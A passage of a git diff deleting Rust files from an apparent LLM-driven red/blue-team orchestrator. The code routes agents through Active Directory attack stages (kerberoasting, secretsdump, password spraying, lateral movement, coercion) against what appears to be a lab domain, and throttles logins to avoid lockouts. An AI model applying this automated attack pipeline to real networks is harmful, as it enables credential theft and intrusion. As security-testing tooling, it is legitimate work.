prompts, calls the LLM, dispatches tool calls to -//! Python workers via Redis, and handles callbacks in Rust. - -use std::sync::{Arc, OnceLock}; - -use anyhow::Result; -use tracing::{debug, info, warn}; - -use ares_llm::prompt::templates; -use ares_llm::prompt::StateSnapshot; -use ares_llm::tool_registry::{self, AgentRole}; -use ares_llm::{ - run_agent_loop, AgentLoopConfig, AgentLoopOutcome, CallbackHandler, LlmProvider, LoopEndReason, - ToolDispatcher, -}; - -use crate::state::SharedState; - -// --------------------------------------------------------------------------- -// LLM task runner -// --------------------------------------------------------------------------- - -/// Drives LLM-powered tasks through the Rust agent loop. -/// -/// Owns an LLM provider and tool dispatcher, and builds prompts from -/// the current operation state. -#[allow(dead_code)] -pub struct LlmTaskRunner { - provider: Box, - model_name: String, - dispatcher: Arc, - state: SharedState, - config: AgentLoopConfig, - /// Deferred callback handler — set after construction to break the - /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency. - callback_handler: OnceLock>, -} - -impl LlmTaskRunner { - pub fn new( - provider: Box, - model_name: String, - dispatcher: Arc, - state: SharedState, - ) -> Self { - let config = AgentLoopConfig { - model: model_name.clone(), - ..AgentLoopConfig::default() - }; - Self { - provider, - model_name, - dispatcher, - state, - config, - callback_handler: OnceLock::new(), - } - } - - /// Set the callback handler after construction. - /// - /// This is safe to call from `&self` (interior mutability via `OnceLock`), - /// which lets us break the circular dependency: the handler needs the - /// `Dispatcher`, which itself holds an `Arc`. - pub fn set_callback_handler(&self, handler: Arc) { - let _ = self.callback_handler.set(handler); - } - - /// Execute a task through the LLM agent loop. - /// - /// This is the main entry point called by the orchestrator when - /// a task should be driven by the LLM rather than pushed to a - /// Python worker's full agent loop. - pub async fn execute_task( - &self, - task_type: &str, - task_id: &str, - role: AgentRole, - payload: &serde_json::Value, - ) -> Result { - let role_str = role.as_str(); - - // 1. Snapshot state (releases RwLock before LLM calls) - let snapshot = self.state.snapshot().await; - - // 2. Build system prompt from agent template - let system_prompt = build_system_prompt(role, &snapshot)?; - - // 3. Build task prompt from Tera template + payload - let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?; - - // 4. Get tool schemas for this role - let tools = tool_registry::tools_for_role(role); - - info!( - task_id = task_id, - task_type = task_type, - role = role_str, - tools = tools.len(), - "Starting LLM agent loop" - ); - - // 5. Run the agent loop - let outcome = run_agent_loop( - self.provider.as_ref(), - Arc::clone(&self.dispatcher), - &self.config, - &system_prompt, - &task_prompt, - role_str, - task_id, - &tools, - self.callback_handler.get().cloned(), - ) - .await; - - log_outcome(task_id, &outcome); - - Ok(outcome) - } -} - -// --------------------------------------------------------------------------- -// Prompt building helpers -// --------------------------------------------------------------------------- - -/// Build the system prompt for a given agent role. -fn build_system_prompt(role: AgentRole, snapshot: &StateSnapshot) -> Result { - // Get capabilities from the tool definitions for this role - let tools = tool_registry::tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !tool_registry::is_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let template_name = match role { - AgentRole::Recon => templates::TEMPLATE_RECON, - AgentRole::CredentialAccess => templates::TEMPLATE_CREDENTIAL_ACCESS, - AgentRole::Cracker => templates::TEMPLATE_CRACKER, - AgentRole::Acl => templates::TEMPLATE_ACL, - AgentRole::Privesc => templates::TEMPLATE_PRIVESC, - AgentRole::Lateral => templates::TEMPLATE_LATERAL, - AgentRole::Coercion => templates::TEMPLATE_COERCION, - AgentRole::Orchestrator => templates::TEMPLATE_ORCHESTRATOR, - }; - - // Render system instructions (no per-role capability map for now) - let system_instructions = templates::render_system_instructions(None)?; - - // Render agent-specific instructions - let agent_instructions = templates::render_agent_instructions( - template_name, - &capabilities, - false, - &snapshot.undominated_forests, - )?; - - Ok(format!("{system_instructions}\n\n{agent_instructions}")) -} - -/// Build the task-specific prompt from payload and state. -fn build_task_prompt( - task_type: &str, - task_id: &str, - payload: &serde_json::Value, - snapshot: &StateSnapshot, -) -> Result { - // Use the PromptBuilder from ares-llm - let prompt = - ares_llm::prompt::generate_task_prompt(task_type, task_id, payload, Some(snapshot)); - - match prompt { - Some(p) => Ok(p), - None => { - warn!( - task_type = task_type, - task_id = task_id, - "No prompt template for task type, using raw payload" - ); - Ok(format!( - "## Task: {task_id}\n\nType: {task_type}\n\nPayload:\n```json\n{}\n```\n\nComplete this task and call `task_complete` with results.", - serde_json::to_string_pretty(payload).unwrap_or_default() - )) - } - } -} - -/// Map task type string to AgentRole. -pub fn role_for_task_type(task_type: &str) -> Option { - match task_type { - "recon" | "nmap" | "bloodhound" | "delegation_enum" | "certipy_find" => { - Some(AgentRole::Recon) - } - "credential_access" | "secretsdump" | "share_spider" | "kerberoast" | "asrep_roast" - | "password_spray" => Some(AgentRole::CredentialAccess), - "crack" => Some(AgentRole::Cracker), - "lateral" | "lateral_movement" => Some(AgentRole::Lateral), - "exploit" | "privesc_enumeration" => Some(AgentRole::Privesc), - "coercion" => Some(AgentRole::Coercion), - "acl_analysis" => Some(AgentRole::Acl), - "command" => None, // Command tasks go to whatever role is specified - _ => None, - } -} - -// --------------------------------------------------------------------------- -// Logging -// --------------------------------------------------------------------------- - -fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) { - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - info!( - task_id = task_id, - steps = outcome.steps, - tool_calls = outcome.tool_calls_dispatched, - input_tokens = outcome.total_usage.input_tokens, - output_tokens = outcome.total_usage.output_tokens, - "Task completed via LLM: {result}" - ); - } - LoopEndReason::RequestAssistance { issue, .. } => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent requested assistance: {issue}" - ); - } - LoopEndReason::MaxSteps => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent hit max steps limit" - ); - } - LoopEndReason::EndTurn { content } => { - debug!( - task_id = task_id, - steps = outcome.steps, - "LLM agent ended turn: {content}" - ); - } - LoopEndReason::MaxTokens => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent hit max tokens" - ); - } - LoopEndReason::Error(err) => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent loop error: {err}" - ); - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_role_for_task_type_recon_variants() { - for tt in &[ - "recon", - "nmap", - "bloodhound", - "delegation_enum", - "certipy_find", - ] { - assert_eq!( - role_for_task_type(tt), - Some(AgentRole::Recon), - "Failed for: {tt}" - ); - } - } - - #[test] - fn test_role_for_task_type_credential_access_variants() { - for tt in &[ - "credential_access", - "secretsdump", - "share_spider", - "kerberoast", - "asrep_roast", - "password_spray", - ] { - assert_eq!( - role_for_task_type(tt), - Some(AgentRole::CredentialAccess), - "Failed for: {tt}" - ); - } - } - - #[test] - fn test_role_for_task_type_other_roles() { - assert_eq!(role_for_task_type("crack"), Some(AgentRole::Cracker)); - assert_eq!(role_for_task_type("lateral"), Some(AgentRole::Lateral)); - assert_eq!( - role_for_task_type("lateral_movement"), - Some(AgentRole::Lateral) - ); - assert_eq!(role_for_task_type("exploit"), Some(AgentRole::Privesc)); - assert_eq!( - role_for_task_type("privesc_enumeration"), - Some(AgentRole::Privesc) - ); - assert_eq!(role_for_task_type("coercion"), Some(AgentRole::Coercion)); - assert_eq!(role_for_task_type("acl_analysis"), Some(AgentRole::Acl)); - } - - #[test] - fn test_role_for_task_type_unmapped() { - assert_eq!(role_for_task_type("command"), None); - assert_eq!(role_for_task_type("unknown"), None); - assert_eq!(role_for_task_type(""), None); - } - - #[test] - fn test_build_system_prompt_all_roles() { - let snapshot = StateSnapshot::default(); - for role in &[ - AgentRole::Recon, - AgentRole::CredentialAccess, - AgentRole::Cracker, - AgentRole::Acl, - AgentRole::Privesc, - AgentRole::Lateral, - AgentRole::Coercion, - AgentRole::Orchestrator, - ] { - let result = build_system_prompt(*role, &snapshot); - assert!(result.is_ok(), "Failed for role: {:?}", role); - let prompt = result.unwrap(); - assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role); - } - } - - #[test] - fn test_build_task_prompt_known_types() { - let snapshot = StateSnapshot::default(); - let payload = serde_json::json!({ - "target_ip": "192.168.58.10", - "domain": "contoso.local", - "techniques": ["nmap"] - }); - - let result = build_task_prompt("recon", "t-1", &payload, &snapshot); - assert!(result.is_ok()); - assert!(!result.unwrap().is_empty()); - } - - #[test] - fn test_build_task_prompt_unknown_type_falls_back() { - let snapshot = StateSnapshot::default(); - let payload = serde_json::json!({"foo": "bar"}); - - let result = build_task_prompt("unknown_type", "t-1", &payload, &snapshot); - assert!(result.is_ok()); - let prompt = result.unwrap(); - assert!(prompt.contains("unknown_type")); - assert!(prompt.contains("task_complete")); - } -} diff --git a/ares-orchestrator/src/main.rs b/ares-orchestrator/src/main.rs deleted file mode 100644 index 3ab22d40..00000000 --- a/ares-orchestrator/src/main.rs +++ /dev/null @@ -1,753 +0,0 @@ -//! Ares Orchestrator — Rust-native orchestration loop. -//! -//! Entry point for the `ares-orchestrator` binary. Rust owns the tokio event -//! loop and all Redis IO. When `ARES_LLM_MODEL` is set, tasks are driven by -//! the Rust LLM agent loop; otherwise they are pushed to Redis for workers. -//! -//! Startup sequence: -//! 1. Load config from env vars -//! 2. Connect to Redis -//! 3. Acquire the operation lock -//! 4. Load shared state from Redis -//! 5. Spawn background tasks: heartbeat monitor, result consumer, deferred -//! processor, cost summary, automation tasks, exploitation workflow, -//! discovery poller, state refresh -//! 6. Enter the main orchestration loop - -mod automation; -mod automation_spawner; -#[cfg(feature = "blue")] -mod blue; -mod bootstrap; -pub(crate) mod callback_handler; -mod completion; -mod config; -mod cost_summary; -mod deferred; -mod dispatcher; -mod exploitation; -mod llm_runner; -mod monitoring; -mod output_extraction; -mod recovery; -mod result_processing; -mod results; -mod routing; -mod state; -mod task_queue; -mod throttling; -mod tool_dispatcher; - -use std::sync::Arc; - -use anyhow::{Context, Result}; -use tokio::signal; -use tokio::sync::watch; -use tracing::{error, info, warn}; - -use crate::automation_spawner::spawn_automation_tasks; -use crate::bootstrap::{bootstrap_meta, dispatch_initial_recon}; -use crate::config::OrchestratorConfig; -use crate::cost_summary::spawn_cost_summary; -use crate::deferred::DeferredQueue; -use crate::dispatcher::Dispatcher; -use crate::monitoring::{spawn_heartbeat_monitor, spawn_lock_keeper, AgentRegistry}; -use crate::results::spawn_result_consumer; -use crate::routing::ActiveTaskTracker; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; -use crate::throttling::Throttler; - -#[tokio::main] -async fn main() -> Result<()> { - let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-orchestrator"), - ); - run().await -} - -async fn run() -> Result<()> { - info!( - version = env!("CARGO_PKG_VERSION"), - "ares-orchestrator starting" - ); - - // --- Blue-only mode: skip red orchestrator, just run blue investigation poller --- - #[cfg(feature = "blue")] - if std::env::var("ARES_BLUE_ONLY").as_deref() == Ok("1") { - return run_blue_only().await; - } - - let config = - Arc::new(OrchestratorConfig::from_env().context("Failed to load config from environment")?); - - // Load the YAML config (optional — provides agent definitions, vuln priorities, etc.) - let ares_config = match ares_core::config::AresConfig::from_env() { - Ok(cfg) => { - info!( - config_name = %cfg.operation.name, - agent_roles = cfg.agents.len(), - "Loaded YAML config" - ); - Some(Arc::new(cfg)) - } - Err(e) => { - info!("No YAML config loaded (using env vars only): {e}"); - None - } - }; - - info!( - operation_id = %config.operation_id, - max_concurrent = config.max_concurrent_tasks, - has_yaml_config = ares_config.is_some(), - "Configuration loaded" - ); - - let queue = TaskQueue::connect(&config.redis_url) - .await - .context("Failed to connect to Redis")?; - - let acquired = queue - .try_acquire_lock(&config.operation_id, config.lock_ttl) - .await?; - if !acquired { - anyhow::bail!( - "Operation {} is locked by another orchestrator", - config.operation_id - ); - } - - let shared_state = SharedState::new(config.operation_id.clone()); - shared_state - .load_from_redis(&queue) - .await - .context("Failed to load state from Redis")?; - - { - let mut state = shared_state.write().await; - if state.target_ips.is_empty() && !config.target_ips.is_empty() { - state.target_ips = config.target_ips.clone(); - info!( - target_domain = %config.target_domain, - target_ips = ?config.target_ips, - "Seeded target info from operation payload" - ); - } - // Seed target domain into state so automation tasks have it - if !config.target_domain.is_empty() { - let domain = config.target_domain.to_lowercase(); - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - // Also persist to Redis - let domain_key = format!("ares:op:{}:domains", state.operation_id); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - info!(domain = %domain, "Seeded target domain"); - } - - // Seed domain_controllers from target IPs so automation tasks - // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire - // immediately without waiting for recon to report back. - // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. - if state.domain_controllers.is_empty() { - let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; - if let Some(ref ip) = dc_ip { - let dc_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - ares_core::state::KEY_DC_MAP, - ); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; - state.domain_controllers.insert(domain.clone(), ip.clone()); - info!( - domain = %domain, - dc_ip = %ip, - "Seeded domain controller from target IPs (port 88 probe)" - ); - - // Also register the credential's domain (may differ from target_domain, - // e.g., child.contoso.local vs contoso.local). - // This ensures automation tasks (spray, kerberoast) can find a DC - // for the credential's domain. - if let Some(ref cred) = config.initial_credential { - let cred_domain = cred.domain.to_lowercase(); - if cred_domain != domain && !cred_domain.is_empty() { - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) - .await; - state - .domain_controllers - .insert(cred_domain.clone(), ip.clone()); - // Also add this domain to the domains set - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!("ares:op:{}:domains", state.operation_id); - let _: Result<(), _> = redis::AsyncCommands::sadd( - &mut conn, - &domain_key, - &cred_domain, - ) - .await; - } - info!( - cred_domain = %cred_domain, - dc_ip = %ip, - "Also registered credential domain in DC map" - ); - } - } - } else { - warn!("No target IP responded on port 88/389 — DC will be discovered by recon"); - } - } - - // Seed placeholder hosts for ALL target IPs (matches Python startup). - // This ensures all IPs appear in the host list even before recon runs, - // and detect_dc() on service results can trigger domain extraction. - { - let host_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - ares_core::state::KEY_HOSTS, - ); - let mut conn = queue.connection(); - for ip in &config.target_ips { - if !state.hosts.iter().any(|h| h.ip == *ip) { - let placeholder = ares_core::models::Host { - ip: ip.clone(), - hostname: String::new(), - os: String::new(), - roles: vec![], - services: vec![], - is_dc: false, - owned: false, - }; - let data = serde_json::to_string(&placeholder).unwrap_or_default(); - let _: Result<(), _> = - redis::AsyncCommands::rpush(&mut conn, &host_key, &data).await; - state.hosts.push(placeholder); - } - } - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &host_key, 86400i64).await; - info!( - count = config.target_ips.len(), - "Seeded placeholder hosts for all target IPs" - ); - } - } - } - - if let Some(ref cred) = config.initial_credential { - let credential = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: cred.username.clone(), - password: cred.password.clone(), - domain: cred.domain.clone(), - source: "initial".to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - }; - match shared_state.publish_credential(&queue, credential).await { - Ok(true) => info!( - username = %cred.username, - domain = %cred.domain, - "Seeded initial credential" - ), - Ok(false) => info!("Initial credential already exists (dedup)"), - Err(e) => warn!("Failed to seed initial credential: {e}"), - } - } - - // Write operation metadata to Redis so workers can discover us - bootstrap_meta(&queue, &config).await?; - - let tracker = ActiveTaskTracker::new(); - let registry = AgentRegistry::new(); - let throttler = Arc::new(Throttler::new(config.clone(), tracker.clone())); - let deferred = Arc::new(DeferredQueue::new(queue.clone(), config.clone())); - - // Priority: ARES_LLM_MODEL env var > config YAML agents.orchestrator.model - let model_spec = std::env::var("ARES_LLM_MODEL").ok().or_else(|| { - let config_path = std::env::var("ARES_CONFIG") - .unwrap_or_else(|_| "/ares/config/ares.yaml".to_string()); - std::fs::read_to_string(&config_path) - .ok() - .and_then(|content| { - let yaml: serde_yaml::Value = serde_yaml::from_str(&content).ok()?; - let model = yaml["agents"]["orchestrator"]["model"].as_str()?; - // Prefix with "openai/" if no provider prefix present - let spec = if model.contains('/') { - model.to_string() - } else { - format!("openai/{model}") - }; - info!(config = %config_path, model = %spec, "Model loaded from config YAML"); - Some(spec) - }) - }).context("No LLM model configured — set ARES_LLM_MODEL or agents.orchestrator.model in config YAML")?; - let (provider, model_name) = - ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; - - // Credential auth throttle — prevents AD account lockout by rate-limiting - // auth-bearing tool calls per credential. Max 3 attempts per 30s window. - // GOAD lockout: 3 bad attempts / 30 min. With multiple concurrent agents, - // even correct passwords can fail if the account is already locked. - let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); - - // Choose tool dispatch strategy: - // ARES_TOOL_DISPATCH=local → in-process via ares_tools::dispatch() - // default → Redis queue for worker consumption (ares:tool_exec:{role}) - let tool_disp: Arc = - if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { - info!("Tool dispatch: local (in-process via ares-tools)"); - Arc::new(tool_dispatcher::LocalToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - } else { - info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})"); - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - }; - - let llm_runner = Arc::new(llm_runner::LlmTaskRunner::new( - provider, - model_name.clone(), - tool_disp, - shared_state.clone(), - )); - info!( - model = %model_name, - "LLM runner initialized — Rust drives all agent loops" - ); - - // --- Central dispatcher --- - let dispatcher = Arc::new(Dispatcher::new( - queue.clone(), - tracker.clone(), - throttler.clone(), - deferred.clone(), - shared_state.clone(), - config.clone(), - ares_config.clone(), - llm_runner.clone(), - )); - - // --- Wire orchestrator callback handler --- - // Deferred initialization: the handler needs the dispatcher, which contains - // the llm_runner, creating a circular dependency. OnceLock breaks the cycle. - let callback_handler = Arc::new( - callback_handler::OrchestratorCallbackHandler::new(shared_state.clone(), queue.clone()) - .with_dispatcher(dispatcher.clone()), - ); - llm_runner.set_callback_handler(callback_handler); - info!("Orchestrator callback handler wired (query + dispatch tools)"); - - // --- Shutdown signal --- - let (shutdown_tx, shutdown_rx) = watch::channel(false); - - // --- Spawn background tasks --- - - // Core infrastructure — lock keeper runs independently to prevent - // lock expiry even if heartbeat sweeps or Redis calls hang. - let lock_handle = spawn_lock_keeper(queue.clone(), config.clone(), shutdown_rx.clone()); - - let hb_handle = spawn_heartbeat_monitor( - queue.clone(), - registry.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let (_result_handle, mut result_rx) = spawn_result_consumer( - queue.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let deferred_handle = deferred::spawn_deferred_processor( - deferred.clone(), - dispatcher.clone(), - throttler.clone(), - config.clone(), - shutdown_rx.clone(), - ); - - let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone()); - - // Exploitation workflow - let exploit_disp = dispatcher.clone(); - let exploit_shutdown = shutdown_rx.clone(); - let exploit_handle = tokio::spawn(async move { - exploitation::exploitation_workflow(exploit_disp, exploit_shutdown).await - }); - - // Discovery poller - let disc_disp = dispatcher.clone(); - let disc_shutdown = shutdown_rx.clone(); - let disc_handle = - tokio::spawn( - async move { result_processing::discovery_poller(disc_disp, disc_shutdown).await }, - ); - - // State refresh - let refresh_disp = dispatcher.clone(); - let refresh_shutdown = shutdown_rx.clone(); - let refresh_handle = - tokio::spawn( - async move { automation::state_refresh(refresh_disp, refresh_shutdown).await }, - ); - - // --- Automation tasks --- - let auto_handles = spawn_automation_tasks(dispatcher.clone(), shutdown_rx.clone()); - - // --- Blue team orchestrator (optional — enabled when ARES_BLUE_ENABLED=1) --- - // Inject observability URLs from YAML config into env vars (blue tools read env vars). - #[cfg(feature = "blue")] - if let Some(ref cfg) = ares_config { - if let Some(ref obs) = cfg.observability { - if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { - std::env::set_var("LOKI_URL", &obs.loki_url); - } - if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { - std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); - } - if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { - std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); - } - } - } - #[cfg(feature = "blue")] - let blue_handle = if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { - // Create a separate LLM provider for the blue team - let blue_model_spec = std::env::var("ARES_BLUE_LLM_MODEL") - .ok() - .filter(|s| !s.is_empty()) - .unwrap_or_else(|| model_spec.clone()); - let (blue_provider, blue_model) = ares_llm::create_provider(&blue_model_spec) - .context("Failed to create blue team LLM provider")?; - - let blue_disp: Arc = - if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { - Arc::new(tool_dispatcher::LocalToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - } else { - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) - }; - - info!(model = %blue_model, "Starting blue team orchestrator"); - Some(( - blue::spawn_blue_orchestrator( - blue_provider, - blue_model, - blue_disp, - config.redis_url.clone(), - shutdown_rx.clone(), - ), - blue::spawn_blue_auto_submit( - queue.clone(), - shared_state.clone(), - config.clone(), - blue_model_spec, - shutdown_rx.clone(), - ), - )) - } else { - None - }; - #[cfg(not(feature = "blue"))] - let blue_handle: Option<(tokio::task::JoinHandle<()>, tokio::task::JoinHandle<()>)> = None; - - // --- Recovery check --- - { - let recovery_mgr = recovery::OperationRecoveryManager::new(config.redis_url.clone()); - match recovery_mgr.recover(&config.operation_id).await { - Ok(recovered) => { - if !recovered.requeued_task_ids.is_empty() || !recovered.failed_task_ids.is_empty() - { - info!( - requeued = recovered.requeued_task_ids.len(), - failed = recovered.failed_task_ids.len(), - "Recovery: re-enqueued interrupted tasks" - ); - } - } - Err(e) => { - // Recovery failure is non-fatal — we already loaded state above - warn!(err = %e, "Recovery check failed (non-fatal, continuing)"); - } - } - } - - // --- Clear stale stop signal --- - // On restart (e.g. re-running with BLUE_ENABLED after a completed op), - // the previous run's stop signal may still be in Redis. Clear it so the - // main loop doesn't exit immediately. - { - let mut conn = queue.connection(); - let stop_key = ares_core::state::build_key(&config.operation_id, "stop_requested"); - let _: Result<(), _> = redis::AsyncCommands::del(&mut conn, &stop_key).await; - } - - // --- Completion monitor --- - let completion_disp = dispatcher.clone(); - let completion_state = shared_state.clone(); - let completion_shutdown = shutdown_rx.clone(); - let completion_handle = tokio::spawn(async move { - completion::wait_for_completion( - &completion_state, - &completion_disp, - completion_shutdown, - std::time::Duration::from_secs( - ares_config - .as_ref() - .map(|c| c.timeouts.operation_timeout) - .filter(|&t| t > 0) - .unwrap_or(7200), - ), - std::time::Duration::from_secs(10), - ) - .await; - info!("Completion monitor finished — operation complete"); - }); - - info!( - operation_id = %config.operation_id, - automation_tasks = auto_handles.len(), - "Orchestration loop started — all background tasks running" - ); - - // --- Pre-flight tool availability check --- - // Wait briefly for workers to start and publish their tool inventories, - // then warn loudly about any critical missing tools. - { - tokio::time::sleep(std::time::Duration::from_secs(5)).await; - let missing = monitoring::preflight_tool_check(&mut queue.connection()).await; - if !missing.is_empty() { - for (role, tools) in &missing { - warn!( - role = %role, - missing = ?tools, - "PREFLIGHT: worker is missing critical tools — operations will be degraded" - ); - } - } else { - info!("Preflight tool check passed — all critical tools available"); - } - } - - // --- Dispatch initial reconnaissance (seeds the reactive automation pipeline) --- - if !config.target_ips.is_empty() { - let recon_count = dispatch_initial_recon(&dispatcher, &config).await; - info!(tasks = recon_count, "Initial recon dispatched"); - } else { - warn!("No target IPs configured — skipping initial recon dispatch"); - } - - // --- Main loop --- - let mut stop_check = tokio::time::interval(std::time::Duration::from_secs(5)); - stop_check.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); - - loop { - tokio::select! { - // Process completed task results - result = result_rx.recv() => { - match result { - Some(completed) => { - result_processing::process_completed_task( - &completed, - &dispatcher, - &throttler, - ).await; - } - None => { - // Result consumer died — channel closed. - // Respawn it after a brief delay. - error!("Result consumer channel closed unexpectedly — restarting consumer"); - tokio::time::sleep(std::time::Duration::from_secs(2)).await; - let (_new_handle, new_rx) = spawn_result_consumer( - queue.clone(), - tracker.clone(), - config.clone(), - shutdown_rx.clone(), - ); - result_rx = new_rx; - } - } - } - - // Poll for remote stop signal from `ares-cli ops stop` - _ = stop_check.tick() => { - let mut conn = queue.connection(); - match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await { - Ok(true) => { - info!("Remote stop requested via Redis — shutting down"); - break; - } - Ok(false) => {} - Err(e) => { - warn!(err = %e, "Failed to check stop signal"); - } - } - } - - // Graceful shutdown on SIGTERM / SIGINT - _ = signal::ctrl_c() => { - info!("Shutdown signal received"); - break; - } - } - } - - // --- Graceful shutdown --- - info!("Shutting down background tasks..."); - let _ = shutdown_tx.send(true); - - // Blue investigations need time to finalize: score_against_ground_truth, - // set_status("completed"), release_lock, generate_report. 10s was too short. - let shutdown_timeout = std::time::Duration::from_secs(120); - tokio::select! { - _ = async { - let _ = tokio::join!( - lock_handle, - hb_handle, - deferred_handle, - cost_handle, - exploit_handle, - disc_handle, - refresh_handle, - completion_handle, - ); - for h in auto_handles { - let _ = h.await; - } - if let Some((h, auto)) = blue_handle { - let _ = h.await; - let _ = auto.await; - } - } => { - info!("All background tasks stopped"); - } - _ = tokio::time::sleep(shutdown_timeout) => { - warn!("Background task shutdown timed out"); - } - } - - // --- Finalize operation in Redis --- - // Write completion metadata, status key, clear lock and active pointer. - // Matches Python's operation completion sequence. - { - let mut conn = queue.connection(); - let has_da = shared_state.read().await.has_domain_admin; - let status = if has_da { "completed" } else { "stopped" }; - match ares_core::state::finalize_operation(&mut conn, &config.operation_id, status).await { - Ok(()) => info!( - operation_id = %config.operation_id, - status = status, - "Operation finalized in Redis" - ), - Err(e) => warn!( - operation_id = %config.operation_id, - err = %e, - "Failed to finalize operation in Redis" - ), - } - } - - info!("ares-orchestrator stopped"); - Ok(()) -} - -/// Run in blue-only mode: just the investigation poller, no red team. -/// -/// Requires only `ARES_REDIS_URL` and an LLM model. No operation ID needed. -#[cfg(feature = "blue")] -async fn run_blue_only() -> Result<()> { - info!("Running in BLUE-ONLY mode (no red team orchestrator)"); - - let redis_url = - std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); - - // Load YAML config for observability URLs - if let Ok(cfg) = ares_core::config::AresConfig::from_env() { - if let Some(ref obs) = cfg.observability { - if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { - std::env::set_var("LOKI_URL", &obs.loki_url); - } - if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { - std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); - } - if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { - std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); - } - } - } - - let model_spec = std::env::var("ARES_LLM_MODEL") - .or_else(|_| std::env::var("ARES_BLUE_LLM_MODEL")) - .context("Set ARES_LLM_MODEL or ARES_BLUE_LLM_MODEL for blue-only mode")?; - - let (provider, model_name) = - ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; - - // Blue uses a simple Redis-based tool dispatcher (no operation-scoped auth throttle) - let queue = crate::task_queue::TaskQueue::connect(&redis_url) - .await - .context("Failed to connect to Redis")?; - let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); - let blue_disp: Arc = - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue, - "blue-orchestrator".to_string(), - auth_throttle, - )); - - info!(model = %model_name, redis = %redis_url, "Blue-only orchestrator ready"); - - let (shutdown_tx, shutdown_rx) = watch::channel(false); - - let blue_handle = - blue::spawn_blue_orchestrator(provider, model_name, blue_disp, redis_url, shutdown_rx); - - // Wait for shutdown signal - signal::ctrl_c().await?; - info!("Shutdown signal received"); - let _ = shutdown_tx.send(true); - - let shutdown_timeout = std::time::Duration::from_secs(120); - tokio::select! { - _ = blue_handle => { - info!("Blue orchestrator stopped"); - } - _ = tokio::time::sleep(shutdown_timeout) => { - warn!("Blue orchestrator shutdown timed out"); - } - } - - info!("ares-orchestrator (blue-only) stopped"); - Ok(()) -} diff --git a/ares-orchestrator/src/monitoring.rs b/ares-orchestrator/src/monitoring.rs deleted file mode 100644 index aac7fd8a..00000000 --- a/ares-orchestrator/src/monitoring.rs +++ /dev/null @@ -1,471 +0,0 @@ -//! Heartbeat monitoring and stale-task cleanup. -//! -//! Mirrors the Python `ares.core.dispatcher.monitoring.MonitoringMixin`: -//! - Periodic heartbeat sweep to detect dead agents -//! - Stale task cleanup to prevent throttle deadlock -//! - Operation lock TTL refresh - -use anyhow::Result; -use chrono::{DateTime, Utc}; -use std::collections::HashMap; -use std::sync::Arc; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; -use 